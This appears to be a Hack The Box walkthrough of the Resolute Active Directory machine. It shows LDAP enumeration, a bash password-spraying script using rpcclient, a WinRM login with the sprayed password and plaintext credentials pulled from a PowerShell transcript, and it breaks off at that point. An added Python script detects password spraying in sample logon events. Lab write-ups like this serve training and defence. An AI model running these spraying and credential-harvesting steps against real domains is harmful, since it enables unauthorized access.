Resolute_HTB
Overview
- Resolute is an easy-difficulty Windows machine with Active Directory.
- An anonymous LDAP bind against Active Directory is used to retrieve the password that a system administrator set on a new user account.
- The password of that account appears to have been changed since then.
- Password spraying shows that this password is still in use on another domain user account, which gives access to the system over WinRM.
- A PowerShell transcript log that captured credentials passed on the command line is found.
- These credentials are used to move laterally to a user who is a member of the DnsAdmins group.
- This group has the ability to specify a plugin DLL for the DNS Server service to load.
- After restarting the DNS service, commands are executed on the domain controller in the context of NT AUTHORITY\SYSTEM.
SCAN
nmap
┌──(kali㉿kali)-[~]
└─$ nmap -sV -Pn -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 20:40 EST
Nmap scan report for 10.10.10.169
Host is up (0.33s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 01:49:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
- Assessment
- Domain: megabank.local
- The domain name is known, so attacks against LDAP look feasible
- Microsoft Windows Server 2008
- It is old, so noPac might also work
windapsearch
- install
┌──(kali㉿kali)-[~/Resolute]
└─$ git clone https://github.com/ropnop/windapsearch.git
Cloning into 'windapsearch'...
remote: Enumerating objects: 83, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 69
Receiving objects: 100% (83/83), 44.61 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (48/48), done.
- It does not run as-is, so I followed the steps in the README, but it still did not work
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ pip install python-ldap
Defaulting to user installation because normal site-packages is not writeable
Collecting python-ldap
Downloading python-ldap-3.4.4.tar.gz (377 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 1.0 MB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
Building wheel for python-ldap (pyproject.toml) ... error
error: subprocess-exited-with-error
× Building wheel for python-ldap (pyproject.toml) did not run successfully.
│ exit code: 1
╰─> [83 lines of output]
running bdist_wheel
running build
running build_py
creating build
creating build/lib.linux-x86_64-cpython-311
copying Lib/ldapurl.py -> build/lib.linux-x86_64-cpython-311
copying Lib/ldif.py -> build/lib.linux-x86_64-cpython-311
creating build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/compat.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/constants.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/functions.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/logger.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/sasl.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/cidict.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/pkginfo.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/dn.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/filter.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/async.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/modlist.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/resiter.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/syncrepl.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/asyncsearch.py -> build/lib.linux-x86_64-cpython-311/ldap
copying Lib/ldap/ldapobject.py -> build/lib.linux-x86_64-cpython-311/ldap
creating build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/deref.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/ppolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/psearch.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/sss.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/pagedresults.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/sessiontrack.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/libldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/readentry.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/pwdpolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/vlv.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/simple.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
copying Lib/ldap/controls/openldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
creating build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/dds.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
copying Lib/ldap/extop/passwd.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
creating build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/models.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/tokenizer.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
copying Lib/ldap/schema/subentry.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
creating build/lib.linux-x86_64-cpython-311/slapdtest
copying Lib/slapdtest/_slapdtest.py -> build/lib.linux-x86_64-cpython-311/slapdtest
copying Lib/slapdtest/__init__.py -> build/lib.linux-x86_64-cpython-311/slapdtest
running egg_info
writing Lib/python_ldap.egg-info/PKG-INFO
writing dependency_links to Lib/python_ldap.egg-info/dependency_links.txt
writing requirements to Lib/python_ldap.egg-info/requires.txt
writing top-level names to Lib/python_ldap.egg-info/top_level.txt
reading manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
no previously-included directories found matching 'Doc/.build'
adding license file 'LICENCE'
writing manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
creating build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/README -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/ca.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/ca.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/client.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/gencerts.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/gennssdb.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
copying Lib/slapdtest/certs/server.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
running build_ext
building '_ldap' extension
creating build/temp.linux-x86_64-cpython-311
creating build/temp.linux-x86_64-cpython-311/Modules
x86_64-linux-gnu-gcc -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -fPIC -DHAVE_SASL -DHAVE_TLS -DLDAPMODULE_VERSION=3.4.4 "-DLDAPMODULE_AUTHOR=python-ldap project" "-DLDAPMODULE_LICENSE=Python style" -IModules -I/usr/include/python3.11 -c Modules/LDAPObject.c -o build/temp.linux-x86_64-cpython-311/Modules/LDAPObject.o
In file included from Modules/LDAPObject.c:3:
Modules/common.h:15:10: fatal error: lber.h: No such file or directory
15 | #include <lber.h>
| ^~~~~~~~
compilation terminated.
error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
ERROR: Failed building wheel for python-ldap
Failed to build python-ldap
ERROR: Could not build wheels for python-ldap, which is required to install pyproject.toml-based projects
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip install python-ldap
Collecting python-ldap
Downloading python-ldap-3.4.4.tar.gz (377 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 3.1 MB/s eta 0:00:00
Installing build dependencies ... done
^C Getting requirements to build wheel ... canceled
ERROR: Operation cancelled by user
- Installing libsasl2-dev with apt-get fixes it
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo apt-get install libsasl2-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
libaio1
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
libsasl2-2 libsasl2-modules libsasl2-modules-db libssl-dev
libssl3 openssl
Suggested packages:
libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal
libsasl2-modules-ldap libsasl2-modules-otp
libsasl2-modules-sql libssl-doc
The following NEW packages will be installed:
libsasl2-dev libssl-dev
The following packages will be upgraded:
libsasl2-2 libsasl2-modules libsasl2-modules-db libssl3
openssl
5 upgraded, 2 newly installed, 0 to remove and 1550 not upgraded.
Need to get 6,235 kB of archives.
After this operation, 13.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-db amd64 2.1.28+dfsg1-4 [19.4 kB]
Get:2 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling/main amd64 libssl3 amd64 3.0.11-1 [2,016 kB]
Get:3 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-2 amd64 2.1.28+dfsg1-4 [56.7 kB]
Get:4 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 libssl-dev amd64 3.0.11-1 [2,431 kB]
Get:6 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules amd64 2.1.28+dfsg1-4 [65.8 kB]
Get:7 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 openssl amd64 3.0.11-1 [1,416 kB]
Get:5 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-dev amd64 2.1.28+dfsg1-4 [230 kB]
Fetched 6,235 kB in 4s (1,732 kB/s)
(Reading database ... 420821 files and directories currently installed.)
Preparing to unpack .../0-libsasl2-modules-db_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../1-libssl3_3.0.11-1_amd64.deb ...
Unpacking libssl3:amd64 (3.0.11-1) over (3.0.8-1) ...
Preparing to unpack .../2-libsasl2-2_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-2:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Selecting previously unselected package libssl-dev:amd64.
Preparing to unpack .../3-libssl-dev_3.0.11-1_amd64.deb ...
Unpacking libssl-dev:amd64 (3.0.11-1) ...
Selecting previously unselected package libsasl2-dev.
Preparing to unpack .../4-libsasl2-dev_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-dev (2.1.28+dfsg1-4) ...
Preparing to unpack .../5-libsasl2-modules_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../6-openssl_3.0.11-1_amd64.deb ...
Unpacking openssl (3.0.11-1) over (3.0.8-1) ...
Setting up libssl3:amd64 (3.0.11-1) ...
Setting up libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) ...
Setting up libssl-dev:amd64 (3.0.11-1) ...
Setting up libsasl2-2:amd64 (2.1.28+dfsg1-4) ...
Setting up openssl (3.0.11-1) ...
Installing new version of config file /etc/ssl/openssl.cnf.original ...
Setting up libsasl2-modules:amd64 (2.1.28+dfsg1-4) ...
Setting up libsasl2-dev (2.1.28+dfsg1-4) ...
Processing triggers for libc-bin (2.36-9) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.2.3) ...
Scanning processes...
Scanning candidates...
Scanning linux images...
Running kernel seems to be up-to-date.
Restarting services...
/etc/needrestart/restart.d/systemd-manager
systemctl restart open-vm-tools.service systemd-journald.service systemd-udevd.service udisks2.service
Service restarts being deferred:
systemctl restart NetworkManager.service
/etc/needrestart/restart.d/dbus.service
systemctl restart docker.service
systemctl restart lightdm.service
systemctl restart systemd-logind.service
No containers need to be restarted.
User sessions running outdated binaries:
kali @ session #2: firefox-esr[35968], lightdm[1251],
qterminal[1986], vmtoolsd[1601], xfce4-panel[1444],
xfce4-session[1287]
kali @ user manager service: at-spi-bus-laun[1368],
systemd[1257]
No VM guests are running outdated hypervisor (qemu) binaries on
this host.
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip3 install python-ldap
Collecting python-ldap
Using cached python-ldap-3.4.4.tar.gz (377 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
Building wheel for python-ldap (pyproject.toml) ... done
Created wheel for python-ldap: filename=python_ldap-3.4.4-cp311-cp311-linux_x86_64.whl size=369623 sha256=bb454d67a738df7c7910dc2d21a0eadf1a0e14ba58094ae4152d8d0a57a3bff1
Stored in directory: /root/.cache/pip/wheels/72/59/42/74cab8c1fe6e14c49959206b24b0f87697351eea2ac9787401
Successfully built python-ldap
Installing collected packages: python-ldap
Successfully installed python-ldap-3.4.4
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
- Information gathering with windapsearch
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U > Users
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
- Create test.sh
┌──(kali㉿kali)-[~/Resolute]
└─$ cat test.sh
#!/bin/bash
# Take the user name out of each windapsearch output line (the part between
# "attribute:" and "@") and check whether the password from the description works
for u in $(cat ./users | awk -F@ '{print $1}' | awk -F: '{print $2}');
do
rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority;
done
- Run it
┌──(kali㉿kali)-[~/Resolute]
└─$ ./test.sh
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
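- Added example (my own code, not from the original notes or from any tool the notes use): seen from the domain controller, the spray above is a burst of logon failures from one source against many different accounts, followed by a single success. The script below runs that detection over a constructed sample of Security log events (IDs 4625 and 4624) reduced to the fields the logic needs; the event records, account names, and the 10-minute / 5-account thresholds are assumptions.

```python
"""Password-spray detection over Windows logon events (added example).

The event records below are constructed for this example: they model what a
domain controller's Security log records as event 4625 (logon failure) and
4624 (logon success), reduced to the fields the detection needs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source fails against six accounts inside two minutes
# and then logs on as the account whose password matched; a second source is
# an ordinary user mistyping their own password twice (not a spray).
SAMPLE_EVENTS = [
    {"time": "2024-01-03T01:52:01", "event_id": 4625, "user": "abigail", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:52:20", "event_id": 4625, "user": "angela", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:52:41", "event_id": 4625, "user": "annette", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:53:03", "event_id": 4625, "user": "claire", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:53:25", "event_id": 4625, "user": "fred", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:53:47", "event_id": 4625, "user": "gustavo", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T01:54:10", "event_id": 4624, "user": "melanie", "src_ip": "10.10.16.4"},
    {"time": "2024-01-03T08:00:00", "event_id": 4625, "user": "naoki", "src_ip": "10.10.10.50"},
    {"time": "2024-01-03T08:00:30", "event_id": 4625, "user": "naoki", "src_ip": "10.10.10.50"},
    {"time": "2024-01-03T08:01:00", "event_id": 4624, "user": "naoki", "src_ip": "10.10.10.50"},
]


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return {src_ip: {"accounts": [...], "logged_in": [...]}} for every source
    that failed logons against at least `min_accounts` distinct accounts within
    some `window`-long span. "logged_in" lists the accounts that source then
    successfully logged on to: the guesses that worked."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src_ip"]].append(
            (datetime.fromisoformat(ev["time"]), ev["event_id"], ev["user"].lower()))

    alerts = {}
    for src, items in by_src.items():
        items.sort()
        fails = [(t, u) for t, eid, u in items if eid == 4625]
        sprayed = set()
        start = 0
        # Sliding window over the time-ordered failures. Counting distinct
        # accounts rather than raw failures is what separates a spray (one
        # password, many accounts) from a brute force (one account, many
        # passwords) or a user fumbling their own password.
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {u for _, u in fails[start:end + 1]}
            if len(accounts) >= min_accounts:
                sprayed |= accounts
        if not sprayed:
            continue
        first_fail = fails[0][0]
        logged_in = sorted({u for t, eid, u in items if eid == 4624 and t >= first_fail})
        alerts[src] = {"accounts": sorted(sprayed), "logged_in": logged_in}
    return alerts


if __name__ == "__main__":
    for src, info in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"[spray] {src}: {len(info['accounts'])} accounts tried, "
              f"successful logons afterwards: {info['logged_in'] or 'none'}")
```

A spray that ends in a success is the case to act on first: the account in "logged_in" needs a reset, and the source should be checked for what it did next over WinRM.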
Initial Access
┌──(kali㉿kali)-[~/Resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Information gathering for lateral movement
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/2/2024 5:47 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> gc c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
